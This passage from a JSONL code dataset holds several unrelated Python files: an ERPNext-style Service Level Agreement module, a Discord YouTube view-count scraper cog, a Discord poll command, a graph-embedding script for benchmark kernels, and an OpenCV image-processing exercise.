time_diff_in_seconds(communications[i].creation, communications[i-1].creation)\n\t\t\tif wait_time > 
0:\n\t\t\t\tpending_time.append(wait_time)\n\n\ttotal_pending_time = sum(pending_time)\n\tresolution_time_in_secs = time_diff_in_seconds(doc.resolution_date, doc.creation)\n\tdoc.user_resolution_time = resolution_time_in_secs - total_pending_time\n\n\ndef change_service_level_agreement_and_priority(self):\n\tif self.service_level_agreement and frappe.db.exists(\"Issue\", self.name) and \\\n\t\tfrappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\n\t\tif not self.priority == frappe.db.get_value(\"Issue\", self.name, \"priority\"):\n\t\t\tself.set_response_and_resolution_time(priority=self.priority, service_level_agreement=self.service_level_agreement)\n\t\t\tfrappe.msgprint(_(\"Priority has been changed to {0}.\").format(self.priority))\n\n\t\tif not self.service_level_agreement == frappe.db.get_value(\"Issue\", self.name, \"service_level_agreement\"):\n\t\t\tself.set_response_and_resolution_time(priority=self.priority, service_level_agreement=self.service_level_agreement)\n\t\t\tfrappe.msgprint(_(\"Service Level Agreement has been changed to {0}.\").format(self.service_level_agreement))\n\n\ndef get_priority(doc):\n\tservice_level_agreement = frappe.get_doc(\"Service Level Agreement\", doc.service_level_agreement)\n\tpriority = service_level_agreement.get_service_level_agreement_priority(doc.priority)\n\tpriority.update({\n\t\t\"support_and_resolution\": service_level_agreement.support_and_resolution,\n\t\t\"holiday_list\": service_level_agreement.holiday_list\n\t})\n\treturn priority\n\n\ndef reset_service_level_agreement(doc, reason, user):\n\tif not frappe.db.get_single_value(\"Support Settings\", \"allow_resetting_service_level_agreement\"):\n\t\tfrappe.throw(_(\"Allow Resetting Service Level Agreement from Support Settings.\"))\n\n\tfrappe.get_doc({\n\t\t\"doctype\": \"Comment\",\n\t\t\"comment_type\": \"Info\",\n\t\t\"reference_doctype\": doc.doctype,\n\t\t\"reference_name\": doc.name,\n\t\t\"comment_email\": user,\n\t\t\"content\": \" reset Service Level Agreement - {0}\".format(_(reason)),\n\t}).insert(ignore_permissions=True)\n\n\tdoc.service_level_agreement_creation = now_datetime(doc.get(\"owner\"))\n\tdoc.set_response_and_resolution_time(priority=doc.priority, service_level_agreement=doc.service_level_agreement)\n\tdoc.agreement_status = \"Ongoing\"\n\tdoc.save()\n\n\ndef reset_metrics(doc, meta):\n\tif meta.has_field(\"resolution_date\"):\n\t\tdoc.resolution_date = None\n\n\tif meta.has_field(\"resolution_time\"):\n\t\tdoc.resolution_time = None\n\n\tif meta.has_field(\"user_resolution_time\"):\n\t\tdoc.user_resolution_time = None\n\n\tif meta.has_field(\"agreement_status\"):\n\t\tdoc.agreement_status = \"Ongoing\"\n\n\ndef set_resolution_time(doc, meta):\n\t# total time taken from issue creation to closing\n\tif not meta.has_field(\"resolution_time\"):\n\t\treturn\n\n\tdoc.resolution_time = time_diff_in_seconds(doc.resolution_date, doc.creation)\n\n\n# called via hooks on communication update\ndef update_hold_time(doc, status):\n\tparent = get_parent_doc(doc)\n\tif not parent:\n\t\treturn\n\n\tif doc.communication_type == \"Comment\":\n\t\treturn\n\n\tstatus_field = parent.meta.get_field(\"status\")\n\tif status_field:\n\t\toptions = (status_field.options or \"\").splitlines()\n\n\t\t# if status has a \"Replied\" option, then handle hold time\n\t\tif (\"Replied\" in options) and doc.sent_or_received == \"Received\":\n\t\t\tmeta = frappe.get_meta(parent.doctype)\n\t\t\thandle_hold_time(parent, meta, 'Replied')\n\n\n
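# Hold-time handling: statuses listed in the SLA's \"Pause SLA On Status\" child table pause\n# the clock; the paused interval is added back onto the response/resolution targets on resume.\ndef 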
handle_hold_time(doc, meta, status):\n\tif meta.has_field(\"service_level_agreement\") and doc.service_level_agreement:\n\t\t# set response and resolution variance as None as the issue is on Hold for status as Replied\n\t\thold_statuses = [entry.status for entry in frappe.db.get_all(\"Pause SLA On Status\", filters={\n\t\t\t\t\"parent\": doc.service_level_agreement\n\t\t\t}, fields=[\"status\"])]\n\n\t\tif not hold_statuses:\n\t\t\treturn\n\n\t\tif meta.has_field(\"status\") and doc.status in hold_statuses and status not in hold_statuses:\n\t\t\tapply_hold_status(doc, meta)\n\n\t\t# calculate hold time when status is changed from any hold status to any non-hold status\n\t\tif meta.has_field(\"status\") and doc.status not in hold_statuses and status in hold_statuses:\n\t\t\treset_hold_status_and_update_hold_time(doc, meta)\n\n\ndef apply_hold_status(doc, meta):\n\tupdate_values = {'on_hold_since': frappe.flags.current_time or now_datetime(doc.get(\"owner\"))}\n\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\tupdate_values['response_by'] = None\n\t\tupdate_values['response_by_variance'] = 0\n\n\tupdate_values['resolution_by'] = None\n\tupdate_values['resolution_by_variance'] = 0\n\n\tdoc.db_set(update_values)\n\n\ndef reset_hold_status_and_update_hold_time(doc, meta):\n\thold_time = doc.total_hold_time if meta.has_field(\"total_hold_time\") and doc.total_hold_time else 0\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\tlast_hold_time = 0\n\tupdate_values = {}\n\n\tif meta.has_field(\"on_hold_since\") and doc.on_hold_since:\n\t\t# last_hold_time will be added to the sla variables\n\t\tlast_hold_time = time_diff_in_seconds(now_time, doc.on_hold_since)\n\t\tupdate_values['total_hold_time'] = hold_time + last_hold_time\n\n\t# re-calculate SLA variables after issue changes from any hold status to any non-hold status\n\tstart_date_time = get_datetime(doc.get(\"service_level_agreement_creation\") or doc.creation)\n\tpriority = get_priority(doc)\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t# add hold time to response by variance\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\tresponse_by = get_expected_time_for(parameter=\"response\", service_level=priority, start_date_time=start_date_time)\n\t\tresponse_by = add_to_date(response_by, seconds=round(last_hold_time))\n\t\tresponse_by_variance = round(time_diff_in_seconds(response_by, now_time))\n\n\t\tupdate_values['response_by'] = response_by\n\t\tupdate_values['response_by_variance'] = response_by_variance + last_hold_time\n\n\t# add hold time to resolution by variance\n\tif frappe.db.get_value(\"Service Level Agreement\", doc.service_level_agreement, \"apply_sla_for_resolution\"):\n\t\tresolution_by = get_expected_time_for(parameter=\"resolution\", service_level=priority, start_date_time=start_date_time)\n\t\tresolution_by = add_to_date(resolution_by, seconds=round(last_hold_time))\n\t\tresolution_by_variance = round(time_diff_in_seconds(resolution_by, now_time))\n\n\t\tupdate_values['resolution_by'] = resolution_by\n\t\tupdate_values['resolution_by_variance'] = resolution_by_variance + last_hold_time\n\n\tupdate_values['on_hold_since'] = None\n\n\tdoc.db_set(update_values)\n\n\ndef get_service_level_agreement_fields():\n\treturn [\n\t\t{\n\t\t\t\"collapsible\": 1,\n\t\t\t\"fieldname\": \"service_level_section\",\n\t\t\t\"fieldtype\": \"Section Break\",\n\t\t\t\"label\": \"Service 
Level\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"service_level_agreement\",\n\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\"label\": \"Service Level Agreement\",\n\t\t\t\"options\": \"Service Level Agreement\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"priority\",\n\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\"label\": \"Priority\",\n\t\t\t\"options\": \"Issue Priority\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"response_by\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Response By\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"response_by_variance\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"hide_seconds\": 1,\n\t\t\t\"label\": \"Response By Variance\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"first_responded_on\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"First Responded On\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"on_hold_since\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"hidden\": 1,\n\t\t\t\"label\": \"On Hold Since\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"total_hold_time\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"label\": \"Total Hold Time\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"cb\",\n\t\t\t\"fieldtype\": \"Column Break\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"default\": \"Ongoing\",\n\t\t\t\"fieldname\": \"agreement_status\",\n\t\t\t\"fieldtype\": \"Select\",\n\t\t\t\"label\": \"Service Level Agreement Status\",\n\t\t\t\"options\": \"Ongoing\\nFulfilled\\nFailed\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"resolution_by\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Resolution By\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"resolution_by_variance\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"hide_seconds\": 1,\n\t\t\t\"label\": \"Resolution By Variance\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"service_level_agreement_creation\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"hidden\": 1,\n\t\t\t\"label\": \"Service Level Agreement Creation\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"depends_on\": \"eval:!doc.__islocal\",\n\t\t\t\"fieldname\": \"resolution_date\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Resolution Date\",\n\t\t\t\"no_copy\": 1,\n\t\t\t\"read_only\": 1\n\t\t}\n\t]\n\n\ndef update_agreement_status_on_custom_status(doc):\n\t# Update Agreement Fulfilled status using Custom Scripts for Custom Status\n\n\tmeta = frappe.get_meta(doc.doctype)\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\t# first_responded_on set when first reply is sent to customer\n\t\tdoc.response_by_variance = round(time_diff_in_seconds(doc.response_by, now_time), 2)\n\n\tif meta.has_field(\"resolution_date\") and not doc.resolution_date:\n\t\t# resolution_date set when issue has been closed\n\t\tdoc.resolution_by_variance = round(time_diff_in_seconds(doc.resolution_by, now_time), 2)\n\n\tif meta.has_field(\"agreement_status\"):\n\t\tdoc.agreement_status = \"Fulfilled\" if doc.response_by_variance > 0 and doc.resolution_by_variance > 0 else \"Failed\"\n\n\ndef update_agreement_status(doc, meta):\n\tif meta.has_field(\"service_level_agreement\") and meta.has_field(\"agreement_status\") and \\\n\t\tdoc.service_level_agreement and doc.agreement_status == \"Ongoing\":\n\n\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", 
doc.service_level_agreement,\n\t\t\t\"apply_sla_for_resolution\")\n\n\t\t# if SLA is applied for resolution check for response and resolution, else only response\n\t\tif apply_sla_for_resolution:\n\t\t\tif meta.has_field(\"response_by_variance\") and meta.has_field(\"resolution_by_variance\"):\n\t\t\t\tif cint(frappe.db.get_value(doc.doctype, doc.name, \"response_by_variance\")) < 0 or \\\n\t\t\t\t\tcint(frappe.db.get_value(doc.doctype, doc.name, \"resolution_by_variance\")) < 0:\n\n\t\t\t\t\tdoc.agreement_status = \"Failed\"\n\t\t\t\telse:\n\t\t\t\t\tdoc.agreement_status = \"Fulfilled\"\n\t\telse:\n\t\t\tif meta.has_field(\"response_by_variance\") and \\\n\t\t\t\tcint(frappe.db.get_value(doc.doctype, doc.name, \"response_by_variance\")) < 0:\n\t\t\t\tdoc.agreement_status = \"Failed\"\n\t\t\telse:\n\t\t\t\tdoc.agreement_status = \"Fulfilled\"\n\n\ndef is_holiday(date, holidays):\n\treturn getdate(date) in holidays\n\n\ndef get_time_in_timedelta(time):\n\t\"\"\"Converts datetime.time(10, 36, 55, 961454) to datetime.timedelta(seconds=38215).\"\"\"\n\timport datetime\n\treturn datetime.timedelta(hours=time.hour, minutes=time.minute, seconds=time.second)\n\n\ndef set_response_by_and_variance(doc, meta, start_date_time, priority):\n\tif meta.has_field(\"response_by\"):\n\t\tdoc.response_by = get_expected_time_for(parameter=\"response\", service_level=priority, start_date_time=start_date_time)\n\n\tif meta.has_field(\"response_by_variance\") and not doc.get('first_responded_on'):\n\t\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\t\tdoc.response_by_variance = round(time_diff_in_seconds(doc.response_by, now_time), 2)\n\ndef set_resolution_by_and_variance(doc, meta, start_date_time, priority):\n\tif meta.has_field(\"resolution_by\"):\n\t\tdoc.resolution_by = get_expected_time_for(parameter=\"resolution\", service_level=priority, start_date_time=start_date_time)\n\n\tif meta.has_field(\"resolution_by_variance\") and not doc.get(\"resolution_date\"):\n\t\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\t\tdoc.resolution_by_variance = round(time_diff_in_seconds(doc.resolution_by, now_time), 2)\n\n\ndef now_datetime(user):\n\tdt = convert_utc_to_user_timezone(datetime.utcnow(), user)\n\treturn dt.replace(tzinfo=None)\n\n\ndef convert_utc_to_user_timezone(utc_timestamp, user):\n\tfrom pytz import timezone, UnknownTimeZoneError\n\n\tuser_tz = get_tz(user)\n\tutcnow = timezone('UTC').localize(utc_timestamp)\n\ttry:\n\t\treturn utcnow.astimezone(timezone(user_tz))\n\texcept UnknownTimeZoneError:\n\t\treturn utcnow\n\n\ndef get_tz(user):\n\treturn frappe.db.get_value(\"User\", user, \"time_zone\") or get_time_zone()\n\n\n@frappe.whitelist()\ndef get_user_time(user, to_string=False):\n\treturn get_datetime_str(now_datetime(user)) if to_string else now_datetime(user)\n\n\n@frappe.whitelist()\ndef get_sla_doctypes():\n\tdoctypes = []\n\tdata = frappe.get_list('Service Level Agreement',\n\t\t{'enabled': 1},\n\t\t['document_type'],\n\t\tdistinct=1\n\t)\n\n\tfor entry in data:\n\t\tdoctypes.append(entry.document_type)\n\n\treturn doctypes\n","sub_path":"verp/support/doctype/service_level_agreement/service_level_agreement.py","file_name":"service_level_agreement.py","file_ext":"py","file_size_in_byte":31190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127178266","text":"from discord.ext import commands, tasks\nimport aiohttp\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import *\nimport 
asyncio\nfrom module import logger as log\nfrom Utility import fetch_all, fetch_one, DBconn, c\n\n\nclass Youtube(commands.Cog):\n def __init__(self, client):\n self.client = client\n # one shared loop instance so stoploop/startloop control the same scheduled task\n self.loop = YoutubeLoop()\n\n @commands.command()\n @commands.is_owner()\n async def addurl(self, ctx, link):\n \"\"\"Add url to youtube videos [Format: %addurl (link)]\"\"\"\n if 'youtube.com' in link or 'youtu.be' in link:\n try:\n c.execute(\"INSERT INTO currency.Links VALUES(%s)\", (link,))\n DBconn.commit()\n await ctx.send(\"> **That video is now being tracked**\")\n except Exception as e:\n log.console(e)\n await ctx.send(\"> **That video is already being tracked.**\")\n\n @commands.command()\n @commands.is_owner()\n async def removeurl(self, ctx, link):\n \"\"\"Remove url from youtube videos [Format: %removeurl (link)]\"\"\"\n try:\n c.execute(\"DELETE FROM currency.Links WHERE Link = %s\", (link,))\n DBconn.commit()\n await ctx.send(\"> **That video has been deleted**\")\n except:\n await ctx.send(\"> **That video is not being tracked.**\")\n\n @commands.command()\n @commands.is_owner()\n async def scrapeyoutube(self, ctx):\n \"\"\"Scrape Youtube Video\"\"\"\n c.execute(\"SELECT link FROM currency.links\")\n links = fetch_all()\n for link in links:\n c.execute(\"SELECT LinkID FROM currency.links WHERE Link = %s\", (link,))\n id = fetch_one()\n async with aiohttp.ClientSession() as session:\n async with session.get('{}'.format(link[0])) as r:\n if r.status == 200:\n page_html = await r.text()\n log.console(page_html)\n page_soup = soup(page_html, \"html.parser\")\n view_count = (page_soup.find(\"div\", {\"class\": \"watch-view-count\"})).text\n # c.execute(\"INSERT INTO currency.ViewCount VALUES (%s,%s)\", (id,datetime.now()))\n # DBconn.commit()\n await ctx.send(f\"> **Managed to scrape DC SCREAM -- {view_count} -- {datetime.now()}**\")\n\n @commands.command()\n @commands.is_owner()\n async def stoploop(self, ctx):\n \"\"\"Stops scraping youtube videos [Format: %stoploop]\"\"\"\n self.loop.new_task5.stop()\n await ctx.send(\"> **If there was a loop, it stopped.**\")\n\n @commands.command()\n @commands.is_owner()\n async def startloop(self, ctx, seconds=0):\n \"\"\"Starts scraping youtube videos [Format: %startloop (seconds)]\"\"\"\n try:\n if seconds >= 0:\n await asyncio.sleep(seconds)\n self.loop.new_task5.start()\n await ctx.send(\"> **Loop started.**\")\n except:\n await ctx.send(\"> **A loop is already running.**\")\n\n\nclass YoutubeLoop:\n def __init__(self):\n self.view_count = []\n self.now = []\n\n @tasks.loop(seconds=0, minutes=30, hours=0, reconnect=True)\n async def new_task5(self):\n check = True\n try:\n c.execute(\"SELECT link FROM currency.links\")\n links = fetch_all()\n except Exception as e:\n check = False\n pass\n if check:\n try:\n for link in links:\n c.execute(\"SELECT LinkID FROM currency.links WHERE Link = %s\", link)\n link_id = fetch_one()\n async with aiohttp.ClientSession() as session:\n async with session.get('{}'.format(link[0])) as r:\n if r.status == 200:\n page_html = await r.text()\n # log.console(page_html)\n page_soup = soup(page_html, \"html.parser\")\n view_count = (page_soup.find(\"div\", {\"class\": \"watch-view-count\"})).text\n now = datetime.now()\n c.execute(\"INSERT INTO currency.ViewCount VALUES (%s,%s,%s)\", (link_id, view_count, now))\n self.view_count.append(view_count)\n self.now.append(now)\n DBconn.commit()\n # log.console(\"Updated Video Views Tracker\")\n except Exception as e:\n log.console(e)\n
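 # clear the per-cycle buffers so the next scheduled pass starts fresh\n self.view_count = []\n self.now = 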
[]\n","sub_path":"module/Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459652747","text":"from .core import CoreBot\nfrom .utils import getname\nfrom .args import Arg\nimport discord\nimport asyncio\n\ndef EnablePolls(bot):\n if not isinstance(bot, CoreBot):\n raise TypeError(\"This function must take a CoreBot\")\n\n bot.polls = {}\n\n @bot.add_command(\n 'poll',\n Arg('title', help=\"Poll Title\"),\n Arg(\"options\", nargs='*', help=\"Poll options\"),\n delimiter='|'\n )\n async def cmd_poll(self, message, args):\n \"\"\"\n `$!poll | [Option 1] | [Option 2] | [etc...]` : Creates a poll\n Example: `$!poll Is $NAME cool? | Yes | Definitely`\n \"\"\"\n #The argparse API is killing the blank handling, but I think that's okay\n opts = [\n (opt.rstrip() if '~' not in opt else opt)\n for opt in args.options\n ]\n if sum(1 for opt in opts if not len(opt)):\n await self.send_message(\n message.author,\n \"Your poll command contained trailing or adjacent `|` characters\"\n \" which resulted in blank fields that I'm going to ignore. If\"\n \" the blank fields were intentional, add `~` into each\"\n \" field that you want to leave blank\"\n )\n opts = [opt.replace('~', '') for opt in opts if len(opt)]\n body = getname(message.author)+\" has started a poll:\\n\"\n body+=args.title+\"\\n\"\n body+=\"\\n\".join((\n \"%d) %s\"%(num+1, opt)\n for (num, opt) in\n enumerate(opts)\n ))\n body+=\"\\n\\nReact with your vote\"\n target = await self.send_message(\n message.channel,\n body,\n skip_debounce=True\n )\n for i in range(1,len(opts)+1):\n await target.add_reaction(\n (b'%d\\xe2\\x83\\xa3'%i).decode()#hack to create number emoji reactions\n )\n if not isinstance(message.channel, discord.PrivateChannel):\n try:\n await message.delete()\n except:\n print(\"Warning: Unable to delete poll source message\")\n self.polls[target.id] = (message.author, set())\n\n @bot.subscribe('reaction_add')\n async def on_reaction_add(self, event, reaction, user):\n if reaction.message.id in self.polls:\n creator, reactors = self.polls[reaction.message.id]\n if user.id not in reactors:\n await self.send_message(\n creator,\n getname(user)+\" has voted on your poll in \"+reaction.message.channel.name\n )\n self.polls[reaction.message.id][1].add(user.id)\n\n return bot\n","sub_path":"bots/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314635521","text":"from karateclub import GL2Vec, Graph2Vec\nimport pandas as pd\nimport os\nfrom collect_dep_graph_features import control_flow_graph_extraction, dep_graph_handcrafted_features_extraction\nfrom control_flow import Control_flow\nfrom handcrafted_dependencies import Dependencies\nfrom settings import tsvc_benchmark, polybench_benchmark, generated_benchmark, features_path, \\\n control_graph_characteristics, \\\n dep_graph_characteristics\nimport networkx as nx\nfrom auxiliary_functions import save_to_cvs\n\n\ndef get_embeddings(data, model):\n \"\"\"\n :param data: (list) list of graphs for those we want to get Embeddings\n :param model: (model) model that will be used to learn Embeddings\n :return: (numpy array) Embeddings\n \"\"\"\n model.fit(data)\n X = model.get_embedding()\n return X\n\n\ndef multiply_embeddings(data, data_label, models=[GL2Vec, Graph2Vec],\n dimensions=[2 ** 6, 2 ** 7, 2 ** 8, 2 ** 9, 2 ** 
10]):\n    \"\"\"\n    This function returns a list of embeddings for the given dimensions and the given models\n    :return: (list, list) - list of embeddings and list of names for each space\n    \"\"\"\n    embeddings = []\n    names = []\n\n    for idx, model in enumerate(models):\n        for dimension in dimensions:\n            embeddings.append(get_embeddings(data, model(dimensions=dimension)))\n            names.append('{}_model_{}_{}'.format(data_label, str(idx + 1), str(dimension)))\n    return embeddings, names\n\n\ndef get_all_graphs(extension=''):\n    \"\"\"\n    This function gets the dependence and control flow graphs for all benchmarks and returns the corresponding kernel names\n    \"\"\"\n    tsvc_control_flow, tsvc_control_names = control_flow_graph_extraction(Control_flow(), tsvc_benchmark.cfg_graphs, extension)\n    poly_control_flow, poly_control_names = control_flow_graph_extraction(Control_flow(), polybench_benchmark.cfg_graphs, extension)\n    generated_control_flow, generated_control_names = control_flow_graph_extraction(Control_flow(), generated_benchmark.cfg_graphs, extension)\n\n    features_poly, poly_dep_graph_names, poly_dep_graphs = dep_graph_handcrafted_features_extraction(\n        Dependencies(), polybench_benchmark.dep_graphs, extension, polybench_benchmark.dep_graphs_features)\n    features_tsvc, tsvc_dep_graph_names, tsvc_dep_graphs = dep_graph_handcrafted_features_extraction(\n        Dependencies(), tsvc_benchmark.dep_graphs, extension, tsvc_benchmark.dep_graphs_features, False)\n\n    features_generated, generated_dep_graph_names, generated_dep_graphs = dep_graph_handcrafted_features_extraction(\n        Dependencies(), generated_benchmark.dep_graphs, extension, generated_benchmark.dep_graphs_features, False)\n\n    control_flow_graphs = poly_control_flow + tsvc_control_flow + generated_control_flow\n    dep_graphs = poly_dep_graphs + tsvc_dep_graphs + generated_dep_graphs\n    control_names = poly_control_names + tsvc_control_names + generated_control_names\n    dep_names = poly_dep_graph_names + tsvc_dep_graph_names + generated_dep_graph_names\n    return control_flow_graphs, control_names, dep_graphs, dep_names\n\n\ndef compute_graph_characteristics(control_flow_graphs, control_names, dep_graphs, dep_names):\n    \"\"\"\n    This function computes some graph characteristics for all benchmarks\n    :param control_flow_graphs: list, list of control flow graphs\n    :param control_names: list, list of names corresponding to control flow graphs\n    :param dep_graphs: list, list of dependence graphs\n    :param dep_names: list, list of names corresponding to dependence graphs\n    :return: (dict, dict) each dictionary contains a kernel name as key and a dict of characteristics as value. The two dictionaries\n    correspond to characteristics for the 2 types of graphs: Dependence and Control Flow\n    \"\"\"\n    number_of_nodes_control_graph = [nx.number_of_nodes(G) for G in control_flow_graphs]\n    number_of_edges_control_graph = [nx.number_of_edges(G) for G in control_flow_graphs]\n\n    characteristics_control_flow = {}\n    for idx, control_name in enumerate(control_names):\n        characteristics_control_flow[control_name] = {'Edges_control': number_of_edges_control_graph[idx],\n                                                      'Nodes_control': number_of_nodes_control_graph[idx],\n                                                      'label': control_name}\n\n    scc_dependence_graph = [nx.number_strongly_connected_components(G) for G in dep_graphs]\n    scc_size_dependence_graph = [len(max(nx.strongly_connected_components(G), key=len)) if nx.number_of_edges(G) > 0 else 0 for G in dep_graphs]\n    number_of_nodes_dependence_graph = [nx.number_of_nodes(G) for G in dep_graphs]\n    number_of_edges_dependence_graph = [nx.number_of_edges(G) for G in dep_graphs]\n\n    characteristics_dependence_graph = {}\n    for idx, control_name in enumerate(dep_names):\n        characteristics_dependence_graph[control_name] = {'Edges_dep': number_of_edges_dependence_graph[idx],\n                                                          'Nodes_dep': number_of_nodes_dependence_graph[idx],\n                                                          'Number_of_SCC': scc_dependence_graph[idx],\n                                                          'Nodes in the largest SCC': scc_size_dependence_graph[idx],\n                                                          'label': control_name}\n\n    return characteristics_control_flow, characteristics_dependence_graph\n\n\ndef create_embeddings(control_flow_graphs, control_names, dep_graphs, dep_names):\n    \"\"\"\n    This function creates all possible combinations of embeddings and stores them to csv\n    :param control_flow_graphs: list, list of control flow graphs\n    :param control_names: list, list of names corresponding to control flow graphs\n    :param dep_graphs: list, list of dependence graphs\n    :param dep_names: list, list of names corresponding to dependence graphs\n    :return: list, list of pandas DataFrames holding the embeddings\n    \"\"\"\n    data_frames = []\n    control_flow_embeddings = multiply_embeddings(control_flow_graphs, 'control')\n    dep_graph_embeddings = multiply_embeddings(dep_graphs, 'dependencies')\n    names = control_flow_embeddings[1] + dep_graph_embeddings[1]\n\n    for embedding in control_flow_embeddings[0]:\n        df = pd.DataFrame(embedding)\n        df['label'] = control_names\n        data_frames.append(df)\n\n    for embedding in dep_graph_embeddings[0]:\n        df = pd.DataFrame(embedding)\n        df['label'] = dep_names\n        data_frames.append(df)\n\n    for idx, df in enumerate(data_frames):\n        df.to_csv(os.path.join(features_path, names[idx]))\n\n    return data_frames\n\n\ndef main():\n    all_graph_information = get_all_graphs()\n    characteristics_control_flow, characteristics_dependence_graph = compute_graph_characteristics(*all_graph_information)\n    save_to_cvs(list(characteristics_dependence_graph.values()), dep_graph_characteristics)\n    save_to_cvs(list(characteristics_control_flow.values()), control_graph_characteristics)\n    create_embeddings(*all_graph_information)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":8220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527603808","text":"'''\nUTFPR - Cornélio Procópio\nCourse: Image Processing\nStudent: Leonardo Batista\nRA: 1885189\n'''\n'''\nrun the code with: \npython -t OPERATION -i imagem.jpg\navailable OPERATIONs: \na) inverse\nb) change-column\nc) change-row\nd) 
histogram-stretching\n'''\n######################################################\n################### Practice 01 ######################\n######################################################\n\nimport cv2 as cv\nimport numpy as np\nimport argparse\n\n#a) invert the intensity values of the image, so that 255 becomes 0, 254 becomes 1, and so on.\ndef inverse(gray):\n    rows = gray.shape[0]\n    cols = gray.shape[1]\n    new_gray = np.ndarray((rows, cols))\n\n    for i in range(rows):\n        for j in range(cols):\n            new_gray[i][j] = 255 - gray[i][j]\n\n    cv.imwrite('a_practice1.png', new_gray)\n    print('the image has been completely inverted')\n\n#b) swap adjacent columns\ndef changeCols(gray):\n    rows = gray.shape[0]\n    cols = gray.shape[1]\n    new_gray = np.ndarray((rows, cols))\n\n    for i in range(rows):\n        for j in range(0, cols, 2):\n            try:\n                new_gray[i][j] = gray[i][j + 1]\n                new_gray[i][j + 1] = gray[i][j]\n            except:\n                continue\n    cv.imwrite('b_practice1.png', new_gray)\n    print('the columns have been swapped')\n\n#c) swap adjacent rows\ndef changeRows(gray):\n    rows = gray.shape[0]\n    cols = gray.shape[1]\n    new_gray = np.ndarray((rows, cols))\n\n    for i in range(0, rows, 2):\n        for j in range(cols):\n            try:\n                new_gray[i][j] = gray[i + 1][j]\n                new_gray[i + 1][j] = gray[i][j]\n            except:\n                continue\n    cv.imwrite('c_practice1.png', new_gray)\n    print('the rows have been swapped')\n\n#d) histogram stretching\ndef histogramStretching(gray, gmax, gmin):\n    rows = gray.shape[0]\n    cols = gray.shape[1]\n    new_gray = np.ndarray((rows, cols))\n\n    fmax = np.max(gray)\n    fmin = np.min(gray)\n\n    # Loop over each pixel and recompute its intensity value\n    for row in range(rows):\n        for column in range(cols):\n            f = gray[row][column]\n            g = ((gmax - gmin)/(fmax-fmin))*(f - fmin) + gmin\n            new_gray[row][column] = int(g)\n\n    cv.imwrite('d_practice1.jpg', new_gray)\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Image processing\")\n    parser.add_argument('-t', '--operation', help='The operation to apply on image', required=True)\n    parser.add_argument('-i', '--image', help='Image path', required=True)\n    args = vars(parser.parse_args())\n\n    img = cv.imread(args['image'])  # Load the image\n    gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)  # Convert the image to grayscale\n\n    if args['operation'] == 'inverse':\n        inverse(gray)\n    elif args['operation'] == 'change-column':\n        changeCols(gray)\n    elif args['operation'] == 'change-row':\n        changeRows(gray)\n    elif args['operation'] == 'histogram-stretching':\n        histogramStretching(gray, 255, 0)\n    else:\n        print('The requested operation is not recognized')\n\nif __name__ == '__main__':\n    main()","sub_path":"practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328122689","text":"from os import path, listdir\nfrom typing import Union, Dict, List, Any, Tuple\n\nimport torch\nimport yaml\nfrom transformers import BertTokenizerFast\n\nimport os\nimport sys\n\nsys.path.append(os.getcwd())\n\nfrom src.models.classifier import DIETClassifier, DIETClassifierConfig\nfrom src.models.trainer import DIETTrainer\nfrom src.data_reader.dataset import DIETClassifierDataset\nfrom 